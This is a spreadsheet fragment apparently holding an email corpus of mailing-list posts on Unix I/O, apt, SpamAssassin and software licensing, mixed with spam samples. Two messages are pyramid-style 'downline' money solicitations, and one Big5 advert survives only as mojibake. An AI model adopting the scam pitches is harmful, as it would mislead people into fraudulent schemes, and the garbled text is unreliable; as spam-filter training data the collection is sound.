 server is rebooted. If some vendor wished to implement this, they could then
 market this as a mechanism to help frustrate broad classes of attack that
 rely on the permanent modification of system or application files via buffer
 overflows, platform and middleware bugs, etc. The prevention of unauthorized
 modification of application data, of course, would not be addressed by this
 particular product. But there are many other techniques out there to defend
 application data. But those techniques all assume that your system itself
 has not been compromised at a lower level, which is where this product could
 help.
 I would have to think that these features would be relatively easy for a
 hardware RAID vendor to implement. (I'm just guessing, of course, with no
 knowledge of how hardware RAID works internally.) If anyone knows of such a
 product, I'd love to hear about it.
 Ben
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: too much news
</t>
  </si>
  <si>
    <t xml:space="preserve">
 So I see a headline which reads:
 "Microsoft Outlining Settlement Plans"
 and my initial reaction is to wonder
 if West Jerusalem should worry that
 Redmond will beat them to embracing
 the West Bank.
 -Dave
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Membership Status Notification
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Free Member,
 You were gifted a free membership in cash 
 wave generator.  Our records indicate your 
 membership is about to expire and you have 
 not locked in your cash wave income by 
 registering for your free position.
 If you do not register, you will forfeit 
 all commissions from spillover.
 To confirm your interest in locking in your 
 position, and for a chance to win $500, use the link 
 mailto:workinathome@btamail.net.cn?subject=Send_CW_Info_Please
 You will receive an email with instructions 
 and where to go to lock in your position and 
 secure your commissions from spillover.
 Cash Wave Generator Administration
 1-800-242-0363, ext. 1993
 To be excluded from future notices:
 mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adams linked to IRA death squad
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381140,215/
 Date: 2002-09-30T03:05:03+01:00
 Sinn Fein president accused of setting up IRA cell to kill 'informers'.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Medical notes
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#medicalNotes
 Date: Wed, 25 Sep 2002 12:49:48 GMT
 Mixed news from yesterday's heart checkup. 
 First, I went seven minutes on the treadmill. That was pretty good. My heart 
 was racing like it hadn't since I was in college. They also did an extensive 
 ultrasound on my carotid arteries[1], they're in the neck and supply my head 
 with blood. More good news there. They're clear, free of plaque, healthy, not 
 diseased[2]. So it appears I just have coronary artery disease, not general 
 artery disease. That's good because there would be a risk of stroke if they 
 were sick, and not a whole lot they can do about it (as they can with the 
 heart). 
 Now there was some not-good news. A small part of my heart isn't working very 
 well. There are a few possible reasons for that, some fixable, some not. I 
 asked the doctor, does this mean I'm going to die sooner, and he said no. Does 
 it mean I have to restrict what I do, he said no. So what does it mean? Really 
 not much, other than I should watch, as before, for recurring symptoms, the 
 ones that brought me into the hospital in June. If they come back, we'll do an 
 angiogram, and maybe an angioplasty, but the likelihood of another bypass 
 because of this is small. That's quite a relief. I don't like the idea of part 
 of my heart not working, but what can you do about it?
 [1] http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;safe=off&amp;q=carotid+arteries&amp;spell=1
 [2] http://www.vascularweb.org/doc/190
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The "other" kind of work-experience ...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Per Hammer &lt;perh@inrs.co.uk&gt;
 http://news.bbc.co.uk/1/hi/world/asia-pacific/2218715.stm
 Brothel duty for Australian MP
 A conservative Member of Parliament in Australia is set to 
 spend the day as a "slave" at one of Western Australia's most 
 notorious brothels. 
 Liberal Party member Barry Haase was "won" in a charity auction 
 after the madam of Langtree's brothel in the mining town of 
 Kalgoorlie made the highest offer for his services for a day. 
 [...]
 "I hope he will leave with an informed decision on what 
 Australian brothels are all about and it will help him in his 
 political career to make informed decisions that he might not 
 have been able to make before," Ms Kenworthy said. 
 Mr Haase, a member of Prime Minister John Howard's party 
 seemed relaxed about the prospect of working in a brothel. 
 "You can't be half-hearted about fundraising for significant 
 charities and I think I'm big enough to play the game," he said. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Debug Support Feature
</t>
  </si>
  <si>
    <t xml:space="preserve">Marc Perkel &lt;marc@perkel.com&gt; writes:
 &gt; Here something I want - maybe it's in there. I want a way to pipe a file 
 &gt; containing messages into one of the "masses" tools and have it output 
 &gt; the messages that match a specific rule.
 &gt; 
 &gt; The reason I want this is to pipe non-spam corpus through a rule and get 
 &gt; a file of messages so I can look at the false positives and try to 
 &gt; figure out why there was a match. IDEALLY - I would like this debug 
 &gt; modes to put [[ ]] around the phrase that triggered the match. I think 
 &gt; this would be a good tool for fixing/improving otherwise good rules that 
 &gt; have unexplained FP.
   $ cd mass-check
   $ ./mass-check [options] &gt; nonspam.log
   $ egrep RULE_NAME nonspam.log|awk '{print $3}'|xargs cat &gt; RULE_NAME.fp
 It's pretty easy to figure out what matched if you write a short perl
 script to match regular expressions or just use pcregrep (perl regular
 expression grep).
 Dan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</si>
  <si>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Buy 1 get 2 FREE: Global Opportunity
</t>
  </si>
  <si>
    <t xml:space="preserve">Established Global Network Marketing Opportunity!
 Our automated sales and marketing system signed up
 over 450 people into my downline for me my first
 day!
 Binary Plan pays INFINITE LEVELS DEEP PLUS 
 up to $75.00 for each personal sale! Share in 3 
 different bonus pools
 Buy ONE position and receive 2 more positions FREE!
 A Tri-Pack for the cost of a single entry! Tripple your
 check!
 For more information and to test drive our automatic
 sales and marketing system click the following link:
 mailto:call4cash@excite.com?subject=more_som_info_please 
 This system signed up over 450 people into my downline
 the first day. Only 2 of them went under me and the
 rest went under other people.  How many of the next
 450 do you want under you?  Reserve your position now 
 for free!
 Please reply now. This company is established and 
 growing rapidly.  Reserve your place now!
 For more information and a FREE test drive of our automatic
 sales and marketing system click the following link:
 mailto:call4cash@excite.com?subject=more_som_info_please 
 Thank you,
 Dan
 Financially Independent Home Business Owner
 1-800-242-0363, Mailbox 1993
 P.S. We have over 1 million opportunity seekers
 which we will be contacting.  I suggest you reserve
 your free position now.
 mailto:call4cash@excite.com?subject=more_som_info_please 
 ______________________________________________________
 To be removed from our database, please click below:
 mailto:nogold4me666@excite.com?subject=remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] deleting "duplicate" spam before training?  good idea
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Greg&gt; OTOH, look into DCC (Distributed Checksum Clearinghouse,
     Greg&gt; http://www.rhyolite.com/anti-spam/dcc/), which uses fuzzy
     Greg&gt; checksums.  It's quite likely that DCC's checksumming scheme is
     Greg&gt; better than something any of us would throw together for personal
     Greg&gt; use (no offense, Skip!).
 None taken.  I wrote my little script before I was aware DCC existed.  Even
 now, it seems like overkill for my use.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Feb 07, 2002 at 12:29:14AM +0200, Peter Peltonen wrote:
 &gt; About apt.conf there are these lines:
 &gt; --&lt;snip&gt;--
 &gt; RPM 
 &gt; {
 &gt;    // Leave list empty to disable
 &gt;    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
 &gt;    HoldPkgs {"kernel-source"; "kernel-headers"; };
 &gt; }
 &gt; --&lt;/snip&gt;--
 &gt; 
 &gt; How do I tell apt hold all kernel packages? Can I use syntax like 
 &gt; "kernel*"; ? 
 &gt; 
 &gt; And I don't quite understand what the part "^kernel$"; means?
 You could read about regular expressions.
 ^kernel$ matches "kernel" and nothimg more.
 Kerne, kernel-smp and kernel-enterprise are the kernel packages you
 might be running in a RH system. Packages like kernel-headers,
 kernel-BOOT and kernel-doc aren't matched. If it just said "kernel", it
 would match *all* those packages.
 -- 
 "You were good with that recorder." (=nokkahuilu)
 "Soitit hyvin sit mankkaa."
 	-- (Suomennos) Men Behaving Badly
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Weird museums of NYC
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524596
 Date: Not supplied
 Great Village Voice story about oddball museums in New York. My favorite 
 weird-ass museum is the Museo de Criminologia in San Jose, Costa Rica, which 
 has bits of victims of famous crimes (machete-dented brain-pans, severed arms, 
 etc) floating in formaldehyde jars. 
     A stone's throw away is the singular Freakatorium, El Museo Loco, a classy 
     treasure chest of curiosities belonging to sword swallower Johnny Fox, 
     whose focus is the rich history of America's earliest museums, from P.T. 
     Barnum's American Museum to the Bowery Dime Museums. The walrus penis bone 
     (other penis bones on display: coyote, mink, fox, raccoon) is enough to 
     make you feel you're getting your $5 worth. But then you spy the Jivaro 
     Shrunken Head (it's real, it's the size of a tennis ball); conjoined 
     piglets in a jar; an assload of taxidermy, including a gorgeous zebra head; 
     giant's rings...  
 Link[1] Discuss[2] (_Thanks, Gary[3]!_)
 [1] http://www.villagevoice.com/bestof/2002/detail.php?id=3085
 [2] http://www.quicktopic.com/boing/H/6XizLZYen3ni
 [3] http://amygdalagf.blogspot.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save 5.00 on Creamfields tickets
</t>
  </si>
  <si>
    <t xml:space="preserve">Creamfields
 Saturday 24th August 2002 2pm-6am (licence granted)
 Old Liverpool Airfield
 Speke Road, Liverpool
 Creamfields. It's What August Bank Holidays Are for.  
 Creamfields is the most intense, chilled out, full on, laid back experience you can cram into one day.  Creamfields is the only award-winning dance festival. It's the only festival to feature the best live acts on an outdoor stage, leaving the arenas to the DJs. Creamfields is the best of Cream, Bugged Out!, Global Underground, Subliminal, Passion, Pacha Futura, Frantic, Nukleuz, Bacardi B Bar and Sunday Best. It Just Gets Better.
 To help get the party started (right), Ticketmaster have negotiated an exclusive offer of 5.00 off the normal price of tickets making the tickets just 41.00 plus booking fee.
 Book here NOW. This offer is only available until 22 June*
 http://www.ticketmaster.co.uk/mkt_email/mktemail.asp?id=114
 The line-up includes:  
 FAITHLESS
 UNDERWORLD
 MIS-TEEQ DJ SHADOW
 KOSHEEN LEMON JELLY STANTON WARRIORS BENT FC KAHUNA
 LAYO AND BUSHWACKA (live) A MAN CALLED ADAM DIRTY VEGAS
 PAUL OAKENFOLD, SASHA, DEEP DISH, PETE TONG, DAVE CLARKE, TIMO MAAS, 
 DJ TIESTO, ERICK MORILLO, SEB FONTAINE, XPRESS 2, JUDGE JULES, YOUSEF, TALL PAUL, FERGIE, STEVE LAWLER, LOTTIE, NICK WARREN, SANDER KLEINENBERG, FERRY CORSTEN, ARMIN VAN BUUREN, JOHN KELLY, SANDRA COLLINS, JUSTIN ROBERTSON, UMEK, JON CARTER, JAMES ZABIELA, JFK, GUY ORNADEL, SCOTT BOND, CORVIN DALEK, ROB DA BANK, PAUL BLEASDALE, JAN CARBON, ANDY CARROLL, RICHARD SCANTY
 And many, many more
 *The offer is strictly subject to availability and does not apply to tickets already purchased.
 To stay up to date with other new events on sale, sign up for Ticketmaster's weekly Ticket Alert email newsletter. http://www.ticketmaster.co.uk/ticket_alert/
 Please do not reply to this email, as you will not get a response. To remove yourself from this mailing list, please email here: mailto:unsubscribe@ticketmaster.co.uk and write "Unsubscribe" in the subject line. For all other enquiries, visit our help page: http://www.ticketmaster.co.uk/help/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] =?big5?Q?=BE=A5=A4=F4=A7X=A7=E5=B5o=B9q=A4l=B3=F8?=
</t>
  </si>
  <si>
    <t xml:space="preserve">nN䥴ͱzIpGsiHzͧxZAb`Pp!!!Цh!!!~~
 OA묹̤FIz٦bϥΰtXܡH
 tӥHCXAMnHӧȦ^QAR4ӾX۷1xAtӷMƱOʶRtXFAƼtۮeʾX~w鵹tFApS@~OTAȡI{bEPSONtCAZ¦⾥X@170Am⾥X@190AOƼtX檺@bAt|@AG̦XʤRt1٫Ky@bI
 syӡoөΤjLӡLөζqcpLөΤ㩱O
 syӡoөΤjLӡ         O             O
 iOޡjUatP(EPSONBHPBCANON)qάۮeʾXAPPSOufq渹Ϊ|[ǤlABʶRƶqh֡A@ߧKOfe쩲AȡFfI(wtlΫOTAȤ@~)I
 ݭnɽШӹq(mail)߰ݩέq (q渹i}ߵo) I
 Ghttp://hk.geocities.com/lijaytw/index.htm ibWqʡI
 qfMuG07-3481489 / FAXG07-9732420 / emailGfen6049@yahoo.com.tw     
 @BEPSONXtCG@ʶR5ӥHWNiɤEufF10ӥHWɤKufI
 GBEPSONXftӬoISO9001{ҤqA~Hu`]˦ӦAD@HR`C~iFHPXκүXoISO14000O{ҤB^syӶifA~gY~ިΦCL˴A~iBt~A100%~OҡI
 TBҦ~ҦOTΫ~O:ϥΤWYD,hL@@󴫷s~AY٬ONA٥iHܰhOC
 |BxW٬ҥiqʡABʶRƶqh֡A@ߧKOfe쩲AȡFf~IڡIi}ߦکεoi|tpjI
 EPSON tC  X 
 iXs/ Cj         /          A                 /            mon
 iS020034 ¦jEpson Stylus ColorBProBProXLBProXL+   mo250 n
 iS020036 mjEpson Stylus ColorBProBProXL  mo350 n
 iS020039 ¦jEpson Stylus 400/800/800+/1000  mo170 n
 iS020047 ¦jEpson Stylus 200/820/Color200/II/IIs mo250 n
 iS020049 mjEpson Stylus 820/1500/1500C    Epson Stylus Color II/II S mo190 n
 iS020089 mjEpson Stylus Color 400/600/800/850/1520 mo190 n
 iS020093 ¦jEpson Stylus Color 400/500/600  Stylus Photo700/Photo710/Photo EX /Photo EX2   IP100 mo170 n
 iS020097 mjEpson Stylus 200    Epson Stylus Color 200/500 mo190 n
 iS020108 ¦jEpson Stylus Color 800/850/1520 mo170 n
 iS020110 mjEpson Stylus Photo700/710/ EX/  EX2   IP100 mo190 n
 iS020118 ¦jEpson Stylus Color 3000  mo800 n
 iS020122 jEpson Stylus Color 3000  mo800 n
 iS020126 jEpson Stylus Color 3000  mo800 n
 iS020130 ŦjEpson Stylus Color 3000  mo800 n
 iS020138 /mjEpson Stylus Color 300  mo190 n
 iS020187 ¦jEpson Stylus Color 440/460/640/660/670 Photo 720/750/1200/EX3 mo170 n
 iS020189 ¦jEpson Stylus Color 740/860/1160  Stylus Scan 2000/2500 mo170 n
 iS020191 mjEpson Stylus Color 440/460/640/660/670/740/860/1160  Epson Stylus Scan 2000/2500 mo190 n
 iS020193 mjEpson Stylus Photo 720/750/EX3 mo190 n
 iT003 ¦jEpson Stylus Color 900/980 mo250 n
 iT005 mjEpson Stylus Color 900/980 mo350 n
 iT013 ¦jEpson Stylus Color 480/580/C20/C20SX/C20U mo170 n
 iT014 mjEpson Stylus Color 480/580/C20/C20SX/C20U mo190 n
 iT019 ¦jEpson Stylus 880/880i mo500 n
 iT020 mjEpson Stylus 880/880i mo450 n
 iT017 ¦jColor 680/685/777() mo350 n
 iT018 mjColor 680/685/777() mo350 n
 iT028 ¦jColor C60SU () mo350 n
 iT029 mjColor C60SU () mo350 n
 iT007 ¦jPhoto 780/785/790/870,875DC/890/895/1270/1280/1290() mo350 n
 iT008 mjPhoto 780/785/790/870,875DC/890/895/1270/1280/1290() mo350 n
 iT009 mjPhoto 1270/1280/1290() mo450 n
 iT0010 mjPhoto 1200() mo400 n
 HP tC  X 
 iHP51625A mjDJ-200/200/320/340/400/420/500/540/550/560/505/560DeskWriter C/CK/320/540/550C/560C mo650 n
 iHP51626A ¦jDJ-400/420/500/500/505/505/520/540/550/560/500/505/560 mo550 n
 iHP51629A ¦jDJ-600/660C/670C/690C/695C//OJ-590/630/635/710/725 mo550 n
 iHP51645A ¦jDJ-710/720/820/830/850/870/880/890/895/930/950/970/990/1000/1120/1120/1225/1600/1600/Photo Smart P1000/P1100/DesignJet 750C/750C PLUS/755CM/OfficeJet G55/G85/G95/R45/R65/T45/T65 OfficeJet PRO 1150C/1170C/1175C/Colour Copier 170 mo550 n
 iHP51649A mjDJ-350I/600/610/640/660/670/690/692/694/695/695/Office Jet 590/630/635/725 mo650 n
 iHPC1823D mjDJ-710C/720C/810C/830C/840/842/880C/890C/895CXI/1120C/1125C mo700 n
 iHPC6578D mjDJ-920C/930C/950C/970CXI/990/1220C/Photo Smart P1000 mo700 n
 iHPC6614A ¦jDJ-610/640 mo550 n
 iHPC6615A ¦jDJ-810C/840C/920C mo550 n
 iHPC6625A mjDJ-840C mo700 n
 EPSON tC  үX
 iS051011 jEpson  EPL-5000/5200 mo2,665  n
 iS051016 jEpson  EPL-5600 mo 2,665 n
 iS051020 jEpson  EPL-3000 mo2,500  n
 iS050005 jEpson  EPL-5500 mo1,550  n
 iS050010 jEpson  EPL-5700/5800 mo 1,750 n
 iS051035 jEpson  EPL-N2000C mo 3,500 n
 iS051022 jEpson  EPL-9000C mo 3,600 n
 iS051069 jEpson  EPL-N2010 mo 2,750 n
 HP tC  үX
 iHP-92274A jLaserJet  4L/4P/4MP mo 1,700 n
 iHP-92275A jLaserJet  IIP/IIIP mo 1,800 n
 iHP-92291A jLaserJet  4SI/IIIS mo2,200  n
 iHP-92295A jLaserJet  II/IID/IIID mo 1,800 n
 iHP-92298A jLaserJet  4/4+/4M/5M mo 2,000 n
 iHP-C3900A jLaserJet  4V/4MV/5M mo 2,500 n
 iHP-C3903A jLaserJet  5P/5MP/6P mo 1,700 n
 iHP-C3906A jLaserJet  5L/6L/3100 mo 1,550 n
 iHP-C3909A jLaserJet  5SI/5SIM/8000 mo 2,650 n
 iHP-C4092A jLaserJet  1100 mo 1,500 n
 iHP-C4096A jLaserJet  2100/2200 mo 2,200 n
 iHP-C4127X jLaserJet  4000/T/N/TN mo 2,950 n
 iHP-C4129X jLaserJet  5000 mo3,150  n
 iHP-C4182X jLaserJet  8100/8150 mo2,550 n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</si>
  <si>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asynchronous I/O (was Re: Gasp!)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 3 Sep 2002, Kragen Sitaker wrote:
 &gt; Of course we've had select() since BSD 4.2 and poll() since System V
 &gt; or so, and they work reasonably well for asynchronous I/O up to a
 &gt; hundred or so channels, but suck after that; /dev/poll (available in
 &gt; Solaris and Linux) is one approach to solving this; Linux has a way to
 &gt; do essentially the same thing with real-time signals, and has for
 &gt; years; and FreeBSD has kqueue.
 &gt;
 &gt; More details about these are at
 &gt; http://www.citi.umich.edu/projects/linux-scalability/
 &gt;
 &gt; None of this helps with disk I/O; most programs that need to overlap
 &gt; disk I/O with computation, on either proprietary Unixes or Linux, just
 &gt; use multiple threads or processes to handle the disk I/O.
 &gt;
 &gt; POSIX specifies a mechanism for nonblocking disk I/O that most
 &gt; proprietary Unixes implement.  The Linux kernel hackers are currently
 &gt; rewriting Linux's entire I/O subsystem essentially from scratch to
 &gt; work asynchronously, because they can easily build efficient
 &gt; synchronous I/O primitives from asynchronous ones, but not the other
 &gt; way around. So now Linux will support this mechanism too.
 &gt;
 &gt; It probably doesn't need saying for anyone who's read Beberg saying
 &gt; things like "Memory management is a non-issue for anyone that has any
 &gt; idea at all how the hardware functions," but he's totally off-base.
 &gt; People should know by now not to take anything he says seriously, but
 &gt; apparently some don't, so I'll rebut.
 &gt;
 &gt; Not surprisingly, the rebuttal requires many more words than the
 &gt; original stupid errors.
 &gt;
 &gt; In detail, he wrote:
 &gt; &gt; Could it be? After 20 years without this feature UNIX finally
 &gt; &gt; catches up to Windows and has I/O that doesnt [sic] totally suck for
 &gt; &gt; nontrivial apps? No way!
 &gt;
 &gt; Unix acquired nonblocking I/O in the form of select() about 23 years
 &gt; ago, and Solaris has had the particular aio_* calls we are discussing
 &gt; for many years.  Very few applications need the aio_* calls ---
 &gt; essentially only high-performance RDBMS servers even benefit from them
 &gt; at all, and most of those have been faking it fine for a while with
 &gt; multiple threads or processes.  This just provides a modicum of extra
 &gt; performance.
 &gt;
 &gt; &gt; OK, so they do it with signals or a flag, which is completely
 &gt; &gt; ghetto, but at least they are trying. Keep trying guys, you got the
 &gt; &gt; idea, but not the clue.
 &gt;
 &gt; Readers can judge who lacks the clue here.
 &gt;
 &gt; &gt; The Windows I/O model does definately [sic] blow the doors off the
 &gt; &gt; UNIX one, but then they had select to point at in it's [sic]
 &gt; &gt; suckiness and anything would have been an improvement. UNIX is just
 &gt; &gt; now looking at it's [sic] I/O model and adapting to a multiprocess
 &gt; &gt; multithreaded world so it's gonna be years yet before a posix API
 &gt; &gt; comes out of it.
 &gt;
 &gt; Although I don't have a copy of the spec handy, I think the aio_* APIs
 &gt; come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is
 &gt; 13 years old, and which I think documented then-current practice.
 &gt; They might be even older than that.
 &gt;
 &gt; Unix has been multiprocess since 1969, and most Unix implementations
 &gt; have supported multithreading for a decade or more.
 &gt;
 &gt; &gt; Bottom line is the "do stuff when something happens" model turned
 &gt; &gt; out to be right, and the UNIX "look for something to do and keep
 &gt; &gt; looking till you find it no matter how many times you have to look"
 &gt; &gt; is not really working so great anymore.
 &gt;
 &gt; Linux's aio_* routines can notify the process of their completion with
 &gt; a "signal", a feature missing in Microsoft Windows; a "signal" causes
 &gt; the immediate execution of a "signal handler" in a process.  By
 &gt; contrast, the Microsoft Windows mechanisms to do similar things (such
 &gt; as completion ports) do not deliver a notification until the process
 &gt; polls them.
 &gt;
 &gt; I don't think signals are a better way to do things in this case
 &gt; (although I haven't written any RDBMSes myself), but you got the
 &gt; technical descriptions of the two operating systems exactly backwards.
 &gt; Most programs that use Linux real-time signals for asynchronous
 &gt; network I/O, in fact, block the signal in question and poll the signal
 &gt; queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo().
 &gt;
 &gt; --
 &gt; &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 &gt; Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after
 &gt; which the world will never be the same.
 &gt; http://www.xent.com/pipermail/fork/2002-August/013974.html
 &gt;
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian wrote:
 &gt;  however, the data will be read and written twice by the
 &gt;  1st (source) `tar', and read twice by the 2nd (sink) `tar',
 &gt;  albeit only written once as the sink realizes the second
 &gt;  copy is a hard link to the first.
 Eh?!? Oh wait... &lt;pause while original mail is re-read&gt;
 Doh. Sorry, I automatically read 'soft' in front of 'links', despite all
 evidence to the contrary. I thought the original question was a bit
 strange...
 On that note: is there any real benefit to using hard links? I avoid them as
 a rule, and cannot think of any good reason to use them at the moment.
 - Matthew
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.comm
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Flat rate is back lads!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 Saw this on the register this morning,
 http://theregister.co.uk/content/6/26983.html, and they support ISDN dual
 channel. Whoo Hoo!
 CW
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: EBusiness Webforms: cluetrain has left the station
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt; writes:
     G&gt; So, if crappy forms-based submission is the state of practice
     G&gt; for business enablement on the Web, I can't see this whole data
     G&gt; submission and hurry up and wait for us to get back to you
     G&gt; business process as working all that well.
 I love this business.  If a bridge falls over, the architect or the
 engineer is in court the next day, but when a /software/ bridge falls
 over, we blame the air beneath it, or the phase of the moon, or
 (more often) the people walking on it.
    "What idiots!  Don't they know you're supposed to walk on the
    /balls/ of your feet, not lead with your heels?  Didn't they read
    the blueprints?  They were posted in the town hall.  Any idiot
    would know the 0.75Hz heel cadence would pop rivets on the
    structural supports!  Geez. Pedestrians are /so/ stupid."
 Ours is the /only/ industry that can hold itself 100% un-responsible
 for any and all sloth-inflicted doom, and the only industry which can
 /also/ get away with feeding this myth of infallibility unquestioned
 to the media, to investors, to students and to each other.
    "God I hate telephones.  Telephones are stupid. I used a telephone
    to, like, call my broker yesterday, and y'know, just /after/ I'd
    ordered those 2000 shares of Nortel ..."
 You just gotta love a mass-delusion like that.
 Although it's like a total shock to 99.999% (5nines) of all the
 employed website designers out there, the truth is webforms /can/
 accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
 also accept /multiple/ or even /free-form/ telephone numbers and can
 even be partitioned into manageable steps. All this can also be done
 without selling exclusive rights to your wallet to the World's
 Second-Richest Corporation (assuming Cisco is still #1) and vendor
 locking your business into their "small transaction fee" tithe.
 Of course, try and tell one of those 5-niners that and they'll get all
 defensive, black list you as a sh*t disturber and undermine your
 reputation with the boss...  not that I'm speaking first-hand or
 anything ;)
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Oh my...
</t>
  </si>
  <si>
    <t xml:space="preserve">LOL you rool  (:
 On Sat, 21 Sep 2002, Gregory Alan Bolcer wrote:
 &gt; I went out and drew some chalk circles on my
 &gt; sidewalk just so I wouldn't miss out on the experience.
 &gt; I've collected half a dozen passwords &amp;
 &gt; access to email accounts so far.
 &gt; 
 &gt; Greg
 &gt; 
 &gt; bitbitch@magnesium.net wrote:
 &gt; &gt; Hello fork,
 &gt; &gt; 
 &gt; &gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
 &gt; &gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
 &gt; &gt;   I'm jealous that he got on radio and I didn't...
 &gt; &gt; 
 &gt; &gt;   But really, WTF is the big deal about warchalking?  I have yet to
 &gt; &gt;   see any of it, anywhere.
 &gt; &gt; 
 &gt; &gt;   LInk will probably pop up on www.npr.org later today.
 &gt; &gt; 
 &gt; &gt;   
 &gt; &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Working My_Mark2CurSeen
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Mon, 30 Sep 2002 14:53:33 -0500
     From:        Hal DeVore &lt;haldevore@acm.org&gt;
     Message-ID:  &lt;3703.1033415613@dimebox.bmc.com&gt;
   | I vote for this being added to CVS, any objections?
 No, but using PickMarkSeen (and pick(ids)) as an alternative to
 just doing
 	Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results
 seems unnecessary to me (that's all that PickMarkSeen does after all).
 (That can be done via "busy")
 Of course, the same is true of the badly named Pick_MarkSeen which has
 nothing at all to do with "pick" except that it (ab)uses the pick(ids) var
 in the same way.   (Its name would be hard to change unfortunately, as it
 is known in app-defaults files for the "Catch Up Unseen" menu item, but
 its implementation could certainly be fixed).
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Subject: There's still time to enter Lifetime's New Season Sweeps!
</t>
  </si>
  <si>
    <t xml:space="preserve">LIFETIMETV.COM SWEEPSTAKES REMINDER
 Thursday, July 25, 2002
 ***********************************************************
 NEW SEASON OF A LIFETIME SWEEPSTAKES
 Enter our New Season of a Lifetime Sweepstakes for a chance to kick up your heels with the stars! On July 28, you can tune in to Lifetime's Sunday night lineup, which includes our new original series, "For the People," and all-new episodes of "Strong Medicine" and "The Division." Best of all, enter the New Season of a Lifetime Sweepstakes and you could win a trip to the set of "Strong Medicine" and a $10,000 summer shopping spree! Enter daily for more chances to win.
 Go to http://www.lifetimetv.com/sweeps/newseason/lt_entry.html.
 ***********************************************************
 We don't want you to miss this fantastic sweepstakes! If you have any problems accessing the link, just copy and paste it into your browser's address box.
 ***********************************************************
 SUBSCRIPTION INFO FOR THE LIFETIMETV.COM SWEEPSTAKES REMINDER
 Please do not reply to this e-mail; it's automatically generated and this mailbox is not read by anyone, therefore you will not get a response. If you wish to be removed from the Sweepstakes Reminder mailing list, please send an e-mail to unsubscribe-sweeps@email.lifetimetv.com. If you are a My Lifetime member and wish to add to or modify your current newsletter preferences, please go to http://www.lifetimetv.com/cgi/edit_profile.cgi and change your subscription options. If you need to write to us, please do so at subscriptions@lifetimetv.com.
 Thank you.
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Kenn Humborg (kenn@bluetree.ie):
 &gt; Not everything on the SuSE CDs is GPL-ed.  IIRC, YAST has a more
 &gt; "proprietary" license.  There may be other third-party commercial
 &gt; products on there as well, which cannot be freely copied under the
 &gt; GPL.
 Indeed.
 The ftp'able tree (e.g., 8.0 for i386) contains to my knowledge only
 items whose licences allow public redistribution, even where they aren't
 open source.  The retail boxed sets (Personal Edition, Professional
 Edition, and Enterprise Edition) _add_ a number of additional
 proprietary apps that are very much _not_ freely redistributable.
 I made a list, a while back:
 Freely redistributable proprietary apps in SuSE
 ----------------------------------------------
 UofW pine/pico/pilot
 John Bradley's xv graphics tool
 T.C. Zhao and Mark Overmars's xforms/xformsd graphics toolkit
 (some others)  
 NON-freely redistributable apps (in boxed sets):
 -----------------------------------------------
 Siemens AG's DB4Web middleware
 Poet Software Corp. FastObjects SDK for Java and C++
 IBM Java 2
 Intel-v92ham winmodem driver
 MainConcept GmbH's MainActor video-editing package
 www.mimer.com's MimerSQL
